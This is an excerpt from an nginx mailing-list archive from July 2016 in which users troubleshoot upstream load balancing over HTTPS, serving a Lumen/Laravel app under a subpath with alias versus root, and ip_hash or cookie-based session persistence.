On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote:
Can anyone give me an example config of what it would look like in both nginx.conf and default.conf using the names/info I have provided?

It seems you have taken the default configuration example, but if you use nginx as a balancer without serving any .php (or other) files you actually don't need those *.php etc. locations - a single location / {} will do the job (meaning all requests go to the backends).
For example:

http {
upstream myappliationsite.net {
    ip_hash;
    server backendappsite1.net;
    server backendappsite2.net;
    server backendappsite3.net;
}

server {
    listen 80;
    listen 443 ssl;

    server_name myappliationsite.net;

    location / {
        proxy_pass http://myappliationsite.net;
        proxy_set_header HOST myappliationsite.net;
    }
}

_______________________________________________
nginx mailing list
nginx at nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

From ben+nginx at list-subs.com Wed Jul 27 16:22:29 2016
From: ben+nginx at list-subs.com (Ben)
Date: Wed, 27 Jul 2016 17:22:29 +0100
Subject: NGINX and Lumen (Laravel) 5
In-Reply-To: <4A4C61D6138D47519CACC5491D364F22@MezhRoze>
References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze>
Message-ID: <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com>

On 27/07/2016 15:50, Reinis Rozitis wrote:
>> Which translates to the following error.log entry :
>>
>> stat() "/usr/share/path/to/my/lumen/public/directory//public/lumen/"
>> failed (13: Permission denied), client: 192.168.121.10, server:
>> my.example.com, request: "POST /lumen/ HTTP/1.1", host: "my.example.com"
>
> Does the nginx user have read permissions on that path?
>

The main problem is that the path does not exist. It exists all the way up to /public/, but NGINX seems to be adding the /lumen/ bit, which I guess is because of "location /lumen", but I'm not too sure how to go about telling it not to add the location path as a suffix.
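[Editorial note] The behaviour Ben describes is how nginx's "root" directive is documented to work: the full request URI, location prefix included, is appended to the root path, whereas "alias" replaces the matched prefix instead. A sketch of the difference, using the thread's placeholder paths (illustration only, not a drop-in config):

```nginx
# "root": the location prefix stays in the filesystem path.
location /lumen {
    root /usr/share/path/to/my/lumen/public/directory//public;
    # GET /lumen/index.php -> .../public/lumen/index.php (missing)
}

# "alias": the matched prefix is replaced by the alias path.
location /lumen {
    alias /usr/share/path/to/my/lumen/public/directory//public;
    # GET /lumen/index.php -> .../public/index.php (present)
}
```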
From ben+nginx at list-subs.com Wed Jul 27 16:27:10 2016
From: ben+nginx at list-subs.com (Ben)
Date: Wed, 27 Jul 2016 17:27:10 +0100
Subject: NGINX and Lumen (Laravel) 5
In-Reply-To: <20160727150702.GB12280@daoine.org>
References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <20160727150702.GB12280@daoine.org>
Message-ID: <1dc8663f-0c12-0166-6208-6e045a62fe07@list-subs.com>

On 27/07/2016 16:07, Francis Daly wrote:
>
> 405 is usually "Method Not Allowed", such as when you try to POST to a file.
>
> But in this case, you do your own "return 405".

POST was just an example, the config doesn't work with GET or anything else.

> What happens if the nginx user does
>
> ls -l "/usr/share/path/to/my/lumen/public/directory//public/lumen/"

Doesn't exist. "/usr/share/path/to/my/lumen/public/directory//public" exists, but the /lumen/ suffix doesn't.

>
> ? And: does that error.log entry only appear once? I would expect it
> twice per request, given your config.

Only appears once.

>
>> location /lumen {
>> root /usr/share/path/to/my/lumen/public/directory//public;
>> try_files $uri $uri/ /index.php?$query_string;
>
> So, $uri fails (permission denied), $uri/ fails (permission denied),
> so now there is an internal rewrite to /index.php.
>
>> location ~ [^/]\.php(/|$) {
>> fastcgi_split_path_info ^(.+?\.php)(/.*)$;
>> if (!-f $document_root$fastcgi_script_name) {
>> return 405;
>> }
>
> And unless /usr/local/nginx/html/index.php exists, that "return 405"
> will happen.

"/usr/share/path/to/my/lumen/public/directory//public/index.php" exists; "/usr/share/path/to/my/lumen/public/directory//public/lumen/index.php" does not, and that seems to be where NGINX is insistent on going.

>
> Does searching for something like "site:laravel.com nginx" or
> "site:nginx.com laravel" or "site:nginx.org laravel" return useful docs?
>

Admittedly I didn't try "site:", but I did try "nginx laravel" and tried a few ideas from various Stack Exchange discussions; nothing much seemed to fix it.
Hence I thought I'd drop by here in case anyone had experienced it before and could save me spending another few hours looking for the proverbial needle in a haystack (since I bet it will end up being a stupidly small NGINX config file change I need to make!).

From r at roze.lv Wed Jul 27 16:39:43 2016
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 27 Jul 2016 19:39:43 +0300
Subject: NGINX and Lumen (Laravel) 5
In-Reply-To: <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com>
References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze> <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com>
Message-ID: <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze>

> It exists all the way up to /public/, but NGINX seems to be adding the
> /lumen/ bit, which I guess is because of "location /lumen", but I'm not
> too sure how to go about telling it not to add the location path as a
> suffix.

You could try using alias instead of root then ( http://nginx.org/en/docs/http/ngx_http_core_module.html#alias ).

In my mind though you're making it complicated. In my experience all the Laravels work simply by doing:

server {
    root /path/laravel/public;

    location / {
        try_files $uri $uri/ /index.php?$query_string;
    }

    location ~ \.php$ {
        fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_index index.php;
        include fastcgi_params;
    }
}

All the non-existing files (it helps to define a separate location for static files though) and virtual paths are passed to Laravel's /index.php "router", and it knows what to do with them without any extra mumbo jumbo on the nginx side.

rr

From project722 at gmail.com Wed Jul 27 17:07:34 2016
From: project722 at gmail.com (Brian Pugh)
Date: Wed, 27 Jul 2016 12:07:34 -0500
Subject: nginx not forwarding requests to backend servers.
In-Reply-To: <240A20A4901A42C99CE03A88864C1A0D@MezhRoze>
References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze>
Message-ID:

Still not working.

Logs show:

2016/07/27 11:59:35 [warn] 28038#28038: *3 upstream server temporarily disabled while reading response header from upstream, client: 192.168.254.202, server: myapplicationsite.net, request: "GET / HTTP/1.1", upstream: "http://192.168.155.120:443/", host: "myapplicationsite.net"

Why does it show http:// with :443 here?

Here is my updated config:

http {
upstream mysiteapplication.net {
    # Use ip hash for session persistence
    ip_hash;
    server backendappsite1:80;
    server backendsiteapp2:80;
    server backendsiteapp3:80;

    # The below only works on nginx plus
    #sticky route $route_cookie $route_uri;
}
upstream ssl_mysiteapplication.net.net {
    # Use ip hash for session persistence
    ip_hash;
    server backendappsite1:443;
    server backendappsite2:443;
    server backendappsite3:443;

    # The below only works on nginx plus
    #sticky route $route_cookie $route_uri;
}

Crasyangel - I am not sure where I am supposed to put this:

u.default_port = 80; in ngx_http_upstream_server

I tried it inside my http upstream block and got a message about unknown directive "u.default_port".

Here is my updated default.conf:

server {
    listen 443 ssl;
    server_name myapplicationsite.net;
    keepalive_timeout 70;

    ssl_certificate /appssl/fd.crt;
    ssl_certificate_key /appssl/lb.key;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers HIGH:!aNULL:!MD5;

    location / {
        proxy_pass http://ssl_test-resolve.cspire.net;
        proxy_set_header HOST test-resolve.cspire.net;
    }
}

On Wed, Jul 27, 2016 at 11:18 AM, Reinis Rozitis wrote:
> : "myapplicationsite.net"
>> 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily
>> disabled while connecting to upstream, client: 192.168.254.202, server:
>> myapplicationsite.net, request: "GET / HTTP/1.1", upstream: "
>> http://192.168.155.120:80/", host: "myapplicationsite.net"
>
> Why is it trying to
connect to my servers over port 80? I need to pass it >> over on 443. How can I accomplish this? Even if I change the proxy pass to >> https in the logs it still trys >> > > As you don't specify the port in upstream {} block nginx uses the default > which is 80 ( > http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server ) > > Also for secure backend connection you should enable proxy_ssl. > > Reading > https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ > should probably be a good start. > > > rr > > > > > > On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: > Can anyone give me an example config of what it would look like in both > nginx.conf and default.conf using the names/info I have provided? > > It seems you have taken the default configuration example but if you use > nginx as a balancer without serving any .php (or other) files you actually > don't need those *.php etc locations - a single location / {} will do the > job (means all requests go to backends). > > For example: > > > http { > upstream myappliationsite.net { > ip_hash; > server backendappsite1.net; > server backendappsite2.net; > server backendappsite3.net; > } > > server { > listen 80; > listen 443 ssl; > > server_name myappliationsite.net; > > location / { > proxy_pass http://myappliationsite.net; > proxy_set_header HOST myappliationsite.net; > } > } > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... 
URL:

From ben+nginx at list-subs.com Wed Jul 27 17:16:20 2016
From: ben+nginx at list-subs.com (Ben)
Date: Wed, 27 Jul 2016 18:16:20 +0100
Subject: NGINX and Lumen (Laravel) 5
In-Reply-To: <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze>
References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze> <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com> <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze>
Message-ID: <34a6d1b4-14be-5f65-989d-c0c070148166@list-subs.com>

On 27/07/2016 17:39, Reinis Rozitis wrote:
>
> You could try to use the alias instead of root then (
> http://nginx.org/en/docs/http/ngx_http_core_module.html#alias ).

I will take a look at that link. Thank you.

>
> In my mind though you're making it complicated.

Perhaps I should clarify the context for why I might not be making things "complicated" as you think. This NGINX config relates to an SSL dev site. I've got a bunch of things I want to use the SSL site for, and laravel/lumen is just one of them, hence the desire (or rather need!) to have it as a path rather than just make laravel/lumen "the" site.

>
> In my experience all the Laravels work just simply by doing:
>
> server {
>
> root /path/laravel/public;
>
> location / {
> try_files $uri $uri/ /index.php?$query_string;
> }
>
> location ~ \.php$ {
> fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
> fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
> fastcgi_index index.php;
> include fastcgi_params;
> }
> }
>
> All the non-existing files (it helps to define a separate location for
> static files though) and virtual paths are passed to the Laravel's
> /index.php "router" and it knows what to do with it without any extra
> mumbo jumbo on nginx side.
>

Will consider it, but as mentioned above, making laravel "the" site is not appropriate for my context.
From project722 at gmail.com Wed Jul 27 17:16:25 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 12:16:25 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> Message-ID: Ok. I was able to get it working by changing this: proxy_pass http://ssl_myapplicationsite.net ; to this: proxy_pass *https*://ssl_myapplicationsite.net ; On Wed, Jul 27, 2016 at 12:07 PM, Brian Pugh wrote: > Still not working. > > Logs show: > > 2016/07/27 11:59:35 [warn] 28038#28038: *3 upstream server temporarily > disabled while reading response header from upstream, client: > 192.168.254.202, server: myapplicationsite.net, request: "GET / > HTTP/1.1", upstream: *"http://192.168.155.120:443/ > "*, host: "myapplicationsite.net" > > Why does it show http:// with :443 here? > > Here is my updated config: > > http { > upstream mysiteapplication.net { > # Use ip hash for session persistance > ip_hash; > server backendappsite1:80; > server backendsiteapp2:80; > server backendsiteapp3:80; > > # The below only works on nginx plus > #sticky route $route_cookie $route_uri; > } > upstream ssl_mysiteapplication.net.net { > # Use ip hash for session persistance > ip_hash; > server backendappsite1:443; > server backendappsite2:443; > server backendappsite3:443; > > # The below only works on nginx plus > #sticky route $route_cookie $route_uri; > } > > Crasyangel - I am not sure where I am supposed to put this: > > u.default_port = 80; in ngx_http_upstream_server > > I tried it inside my http upstream block and got a message about > > unknown directive "u.default_port" > > Here is my updated default.conf: > > server { > listen 443 ssl; > server_name myapplicationsite.net; > keepalive_timeout 70; > > ssl_certificate /appssl/fd.crt; > ssl_certificate_key /appssl/lb.key; > ssl_protocols TLSv1 TLSv1.1 TLSv1.2; > ssl_ciphers HIGH:!aNULL:!MD5; > > location / { > proxy_pass 
http://ssl_test-resolve.cspire.net; > proxy_set_header HOST test-resolve.cspire.net; > > } > } > > > On Wed, Jul 27, 2016 at 11:18 AM, Reinis Rozitis wrote: > >> : "myapplicationsite.net" >>> 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily >>> disabled while connecting to upstream, client: 192.168.254.202, server: >>> myapplicationsite.net, request: "GET / HTTP/1.1", upstream: " >>> http://192.168.155.120:80/", host: "myapplicationsite.net" >>> >> >> Why is it trying to connect to my servers over port 80? I need to pass it >>> over on 443. How can I accomplish this? Even if I change the proxy pass to >>> https in the logs it still trys >>> >> >> As you don't specify the port in upstream {} block nginx uses the default >> which is 80 ( >> http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server ) >> >> Also for secure backend connection you should enable proxy_ssl. >> >> Reading >> https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ >> should probably be a good start. >> >> >> rr >> >> >> >> >> >> On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: >> Can anyone give me an example config of what it would look like in both >> nginx.conf and default.conf using the names/info I have provided? >> >> It seems you have taken the default configuration example but if you use >> nginx as a balancer without serving any .php (or other) files you actually >> don't need those *.php etc locations - a single location / {} will do the >> job (means all requests go to backends). 
>> >> For example: >> >> >> http { >> upstream myappliationsite.net { >> ip_hash; >> server backendappsite1.net; >> server backendappsite2.net; >> server backendappsite3.net; >> } >> >> server { >> listen 80; >> listen 443 ssl; >> >> server_name myappliationsite.net; >> >> location / { >> proxy_pass http://myappliationsite.net; >> proxy_set_header HOST myappliationsite.net; >> } >> } >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> >> >> >> >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From project722 at gmail.com Wed Jul 27 19:02:23 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 14:02:23 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> Message-ID: Reinis Rozitis said: Also for secure backend connection you should enable proxy_ssl. Reading https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ should probably be a good start. ===================================== Is this a feature I can get without having to purchase nginx plus? If my nginx server has an SSL cert loaded that validates the hostnames for the backend servers and my backend servers also have the same cert and communications are going over port 443 why would I need to do anything else? On Wed, Jul 27, 2016 at 12:16 PM, Brian Pugh wrote: > Ok. 
I was able to get it working by changing this: > > proxy_pass http://ssl_myapplicationsite.net > ; > > to this: > > proxy_pass *https*://ssl_myapplicationsite.net > ; > > > > On Wed, Jul 27, 2016 at 12:07 PM, Brian Pugh wrote: > >> Still not working. >> >> Logs show: >> >> 2016/07/27 11:59:35 [warn] 28038#28038: *3 upstream server temporarily >> disabled while reading response header from upstream, client: >> 192.168.254.202, server: myapplicationsite.net, request: "GET / >> HTTP/1.1", upstream: *"http://192.168.155.120:443/ >> "*, host: "myapplicationsite.net" >> >> Why does it show http:// with :443 here? >> >> Here is my updated config: >> >> http { >> upstream mysiteapplication.net { >> # Use ip hash for session persistance >> ip_hash; >> server backendappsite1:80; >> server backendsiteapp2:80; >> server backendsiteapp3:80; >> >> # The below only works on nginx plus >> #sticky route $route_cookie $route_uri; >> } >> upstream ssl_mysiteapplication.net.net { >> # Use ip hash for session persistance >> ip_hash; >> server backendappsite1:443; >> server backendappsite2:443; >> server backendappsite3:443; >> >> # The below only works on nginx plus >> #sticky route $route_cookie $route_uri; >> } >> >> Crasyangel - I am not sure where I am supposed to put this: >> >> u.default_port = 80; in ngx_http_upstream_server >> >> I tried it inside my http upstream block and got a message about >> >> unknown directive "u.default_port" >> >> Here is my updated default.conf: >> >> server { >> listen 443 ssl; >> server_name myapplicationsite.net; >> keepalive_timeout 70; >> >> ssl_certificate /appssl/fd.crt; >> ssl_certificate_key /appssl/lb.key; >> ssl_protocols TLSv1 TLSv1.1 TLSv1.2; >> ssl_ciphers HIGH:!aNULL:!MD5; >> >> location / { >> proxy_pass http://ssl_test-resolve.cspire.net; >> proxy_set_header HOST test-resolve.cspire.net; >> >> } >> } >> >> >> On Wed, Jul 27, 2016 at 11:18 AM, Reinis Rozitis wrote: >> >>> : "myapplicationsite.net" >>>> 2016/07/27 10:54:05 [warn] 
27491#27491: *3 upstream server temporarily >>>> disabled while connecting to upstream, client: 192.168.254.202, server: >>>> myapplicationsite.net, request: "GET / HTTP/1.1", upstream: " >>>> http://192.168.155.120:80/", host: "myapplicationsite.net" >>>> >>> >>> Why is it trying to connect to my servers over port 80? I need to pass >>>> it over on 443. How can I accomplish this? Even if I change the proxy pass >>>> to https in the logs it still trys >>>> >>> >>> As you don't specify the port in upstream {} block nginx uses the >>> default which is 80 ( >>> http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server ) >>> >>> Also for secure backend connection you should enable proxy_ssl. >>> >>> Reading >>> https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ >>> should probably be a good start. >>> >>> >>> rr >>> >>> >>> >>> >>> >>> On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: >>> Can anyone give me an example config of what it would look like in both >>> nginx.conf and default.conf using the names/info I have provided? >>> >>> It seems you have taken the default configuration example but if you use >>> nginx as a balancer without serving any .php (or other) files you actually >>> don't need those *.php etc locations - a single location / {} will do the >>> job (means all requests go to backends). 
>>> >>> For example: >>> >>> >>> http { >>> upstream myappliationsite.net { >>> ip_hash; >>> server backendappsite1.net; >>> server backendappsite2.net; >>> server backendappsite3.net; >>> } >>> >>> server { >>> listen 80; >>> listen 443 ssl; >>> >>> server_name myappliationsite.net; >>> >>> location / { >>> proxy_pass http://myappliationsite.net; >>> proxy_set_header HOST myappliationsite.net; >>> } >>> } >>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >>> >>> >>> >>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 27 19:16:56 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 22:16:56 +0300 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> Message-ID: <322E9BC92191421CAB6EFD8952734AFC@MezhRoze> > Is this a feature I can get without having to purchase nginx plus? Yes, it's also mentioned in the article ".. or the latest NGINX Open Source compiled .." Afaik there are no extra nginx+ features in the proxy module, the upstream has dynamic backend and healthchecks in the commercial subscription though. 
rr

From r at roze.lv Wed Jul 27 19:42:32 2016
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 27 Jul 2016 22:42:32 +0300
Subject: NGINX and Lumen (Laravel) 5
In-Reply-To: <34a6d1b4-14be-5f65-989d-c0c070148166@list-subs.com>
References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze> <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com> <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze> <34a6d1b4-14be-5f65-989d-c0c070148166@list-subs.com>
Message-ID: <7A17EF0D124244BAA0584875EC8E69C9@MezhRoze>

> Will consider it, but as mentioned above, making laravel "the" site is not
> appropriate for my context.

Because of how nginx locations work (only one gets chosen for a request), running several applications under one virtual server/domain can sometimes be challenging. Also, because laravel/lumen applications keep their 'public' as a second-level folder, putting the whole application into the existing root would somewhat expose all the "non-public" (upper-level) folders.

If the Lumen app is outside the default root, you could try something like this:

location ^~ /lumen {
    alias /usr/share/path/to/my/lumen/public;
    try_files $uri $uri/ /lumen/index.php?$query_string;

    location ~ \.php$ {
        fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_index index.php;
        include fastcgi_params;
    }
}

There is an extra nested \.php {} location within the /lumen location because, if you only have a global *.php block, the request won't have the alias directive active.

rr

From project722 at gmail.com Wed Jul 27 20:21:03 2016
From: project722 at gmail.com (Brian Pugh)
Date: Wed, 27 Jul 2016 15:21:03 -0500
Subject: session persistance with IP hash
Message-ID:

Running nginx free version 1.10.1-1.el6.ngx.x86_64 on RHEL 6.7.
In my conf I am using

http {
upstream backend {
    # Use ip hash for session persistence
    ip_hash;
    server backend1:80;
    server backend2:80;
    server backend3:80;
}

My understanding is that the ip_hash directive is responsible for session persistence. My questions are:

1) How long does it last? For example, if I connect and my ip hash tells nginx to connect to backend3, will my source IP be forever tied to backend3?

2) Is there another way to achieve session persistence other than ip hash and other than purchasing the plus edition?

3) Is there an ip hash "cache" or something I can clean out periodically to force the source IP to get a new hash and therefore a chance to connect to a different server?

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From rpaprocki at fearnothingproductions.net Wed Jul 27 20:35:06 2016
From: rpaprocki at fearnothingproductions.net (Robert Paprocki)
Date: Wed, 27 Jul 2016 13:35:06 -0700
Subject: session persistance with IP hash
In-Reply-To: References: Message-ID:

Hello,

On Wed, Jul 27, 2016 at 1:21 PM, Brian Pugh wrote:
> Running nginx free version 1.10.1-1.el6.ngx.x86_64 on RHEL 6.7. In my conf
> I am using
>
> http {
> upstream backend {
> # Use ip hash for session persistence
> ip_hash;
> server backend1:80;
> server backend2:80;
> server backend3:80;
>
> }
>
> My understanding is that the ip_hash directive is responsible for session
> persistence. My questions are:
>
> 1) How long does it last? For example, if I connect and my ip hash tells
> nginx to connect to backend3, will my source IP be forever tied to backend
> 3?
>

Yes, sorta. Hashing does not really provide "persistence" in the manner you're thinking of. An upstream block using hashing will provide a backend for a given client based on a deterministic hashing algorithm (something roughly like crc32 of the key, modulo the number of elements in the upstream group, then accounting for weights).
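[Editorial note] The deterministic selection described above can be sketched in a few lines of Python. This is a toy model for illustration only - nginx's actual ip_hash implementation differs (it hashes only part of the address and accounts for weights) - but it shows why the mapping is stable until the set of usable backends changes:

```python
import zlib

def pick_backend(key, backends):
    # Toy model: crc32 of the key, modulo the number of usable backends.
    return backends[zlib.crc32(key.encode()) % len(backends)]

backends = ["backend1", "backend2", "backend3"]

# Deterministic: the same key always yields the same backend.
assert pick_backend("192.168.254.202", backends) == pick_backend("192.168.254.202", backends)

# But if a node drops out, the modulus changes and keys may be remapped;
# when it comes back, the original mapping is restored.
survivors = ["backend1", "backend3"]
print(pick_backend("192.168.254.202", backends))
print(pick_backend("192.168.254.202", survivors))
```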
Hash-based balancing is designed to always provide the same value for a given key, provided that the weights and status of all backend nodes do not change. If the weights are changed during runtime, or a node is unreachable, then the hash will return a different value (and once the node is reachable again, the previous value will be returned for subsequent requests).

> 2) Is there another way to achieve session persistence other than ip hash
> and other than purchasing plus edition?
>

There are some third-party modules available, but the quality and stability of those isn't guaranteed.

> 3) Is there an ip hash "cache" or something I can clean out periodically to
> force the source IP to get a new hash and therefore a chance to connect to
> a different server?
>

No, see above. Hashing algorithms are deterministic: given the same number and weight distribution of backend nodes, you will _always_ get the same result. That's the point ;) There's no "cache" or pre-determined result for a given client IP - the upstream is re-calculated with the hashing algorithm on every request. If Nginx cannot connect to the upstream node that its hashing algorithm first selects, it will move on to subsequent nodes in the backend.

If you want very fine-grained/custom/arbitrary load balancing algorithms, you can write your own in Lua using the ngx+lua module and the balancer_by_lua directive ( https://github.com/openresty/lua-resty-core/blob/master/lib/ngx/balancer.md ). This is not available in vanilla open source Nginx, but it is available as part of the OpenResty project.

Do also note that in addition to the ip_hash method there is a generic hash method that can take arbitrary keys to generate the hash. This can include Nginx variables, such as $uri, header values, etc.

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From r at roze.lv Wed Jul 27 20:44:00 2016
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 27 Jul 2016 23:44:00 +0300
Subject: session persistance with IP hash
In-Reply-To: References: Message-ID: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze>

> My understanding is that the ip_hash directive is responsible for session
> persistence. My questions are:
> 1) How long does it last? For example, if I connect and my ip hash tells
> nginx to connect to backend3, will my source IP be forever tied to backend
> 3?

If your IP doesn't change and all the servers are up, you will most likely always land on the same backend server. http://nginx.org/en/docs/http/ngx_http_upstream_module.html#ip_hash

> 2) Is there another way to achieve session persistence other than ip hash
> and other than purchasing plus edition?

Yes, you can use different hash mechanisms/keys (for example specific cookies etc.): https://nginx.org/en/docs/stream/ngx_stream_upstream_module.html#hash

There are also some third-party sticky cookie modules.

I personally prefer to use centralised cache storage (memcache/redis etc.) so it doesn't matter on which server the user lands, and the servers can be used in round-robin fashion.

> 3) Is there an ip hash "cache" or something I can clean out periodically
> to force the source IP to get a new hash and therefore a chance to connect
> to a different server?

The standard nginx hash mechanisms don't have any inbuilt "cache". In the case of ip_hash you can change the upstream server order (though it will swap around all the users, not only a particular remote addr).
rr From project722 at gmail.com Wed Jul 27 20:55:11 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 15:55:11 -0500 Subject: session persistance with IP hash In-Reply-To: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> Message-ID: Reinis Rozitis said: Yes, you can use different hash mechanisms/keys (for example specific cookies etc): https://nginx.org/en/docs/stream/ngx_stream_upstream_module.html#hash There are also some third-party sticky cookie modules. Took a look at the link, but I have no idea what that would look like in my upstream stanza. Can you provide an example of what that would look like if I had 3 different backend servers and wanted to ensure that my hash was based on a cookie, or based on just a hash that provided a different backend server per session? So in theory I could also just run a daily script to weight the servers differently or change the server order to manipulate how the hash is calculated? Has that ever been done with success? On Wed, Jul 27, 2016 at 3:44 PM, Reinis Rozitis wrote: > My understanding is that the ip_hash directive is responsible for session >> persistence. My questions are: >> 1) How long does it last? For example, if I connect and my ip hash tells >> nginx to connect to backend3, will my source IP be forever tied to backend >> 3? >> > > If your IP doesn't change and all the servers are up, you will most likely > always land on the same backend server. > http://nginx.org/en/docs/http/ngx_http_upstream_module.html#ip_hash > > > 2) Is there another way to acheive session persistence other than ip hash >> and other than purchasing plus edition? >> > > Yes, you can use different hash mechanisms/keys (for example specific > cookies etc): > https://nginx.org/en/docs/stream/ngx_stream_upstream_module.html#hash > > There are also some third-party sticky cookie modules. 
> I personally prefer to use centralised cache storage (memcache/redis etc)
> so it doesn't matter on which server the user lands and they can be used in
> roundrobin fashion.
>
>> 3) Is there an ip hash "cache" or something I can clean out periodically
>> to force the source IP to get a new hash and therefore a chance to connect
>> to a different server?
>
> The standard nginx hash mechanisms don't have any inbuilt "cache". In case
> of ip_hash you can change the upstream server order (though it will swap
> around all the users not only particular remote addr).
>
> rr
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

-------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 27 22:01:56 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 28 Jul 2016 01:01:56 +0300 Subject: session persistance with IP hash In-Reply-To: References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> Message-ID: <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze>

> Took a look at the link, but I have no idea what that would look like in my
> upstream stanza. Can you provide an example of what that would look like if
> I had 3 different backend servers and wanted to ensure that my hash was
> based on a cookie, or based on just a hash that provided a different
> backend server per session?

With the vanilla nginx it would be something like (and for example let's say your cookie name is BACKEND):

upstream backend {
    hash $cookie_BACKEND;
    server backend1:80;
    server backend2:80;
    server backend3:80;
}

The problem with this (if it matters) is that there is no (pre)defined value of the cookie BACKEND which would specifically route a particular client to a particular backend - I mean, for example, if you use the values 'backend1', 'backend2', 'backend3', the hashed keys might (or might not) as well all point to the same backend server.
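That collision point is easy to demonstrate with a toy hash-to-bucket mapping in Python (CRC32 modulo the server count is only a stand-in here, not necessarily nginx's exact algorithm, and the cookie values are made up):

```python
import zlib

servers = ["backend1", "backend2", "backend3"]

def pick(key: str) -> str:
    # Hash the cookie value and map it onto the server list. Nothing
    # guarantees that three hand-picked values land on three different
    # servers - the buckets depend entirely on the hash output.
    return servers[zlib.crc32(key.encode()) % len(servers)]

# Deterministic: the same cookie value always selects the same server.
assert pick("BACKEND=foo") == pick("BACKEND=foo")

# But distinct values may still collide onto one server:
for value in ("backend1", "backend2", "backend3"):
    print(value, "->", pick(value))
```

Running this for a handful of candidate values is a quick way to find three that actually spread across all three backends.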
So unless you find 3 values which for sure point to different backends, the load/users might not be evenly distributed (in general it is the same as with ip_hash: if the end-users don't have very distinct IPs or, for example, are all in the same subnet, all the users will land on the same backend (as per the documentation - "The first three octets of the client IPv4 address are used as a hashing key.")). It shouldn't be too hard though. Of course, if the values differ (a different cookie for each user), in the longer run the requests will be somewhat evenly distributed.

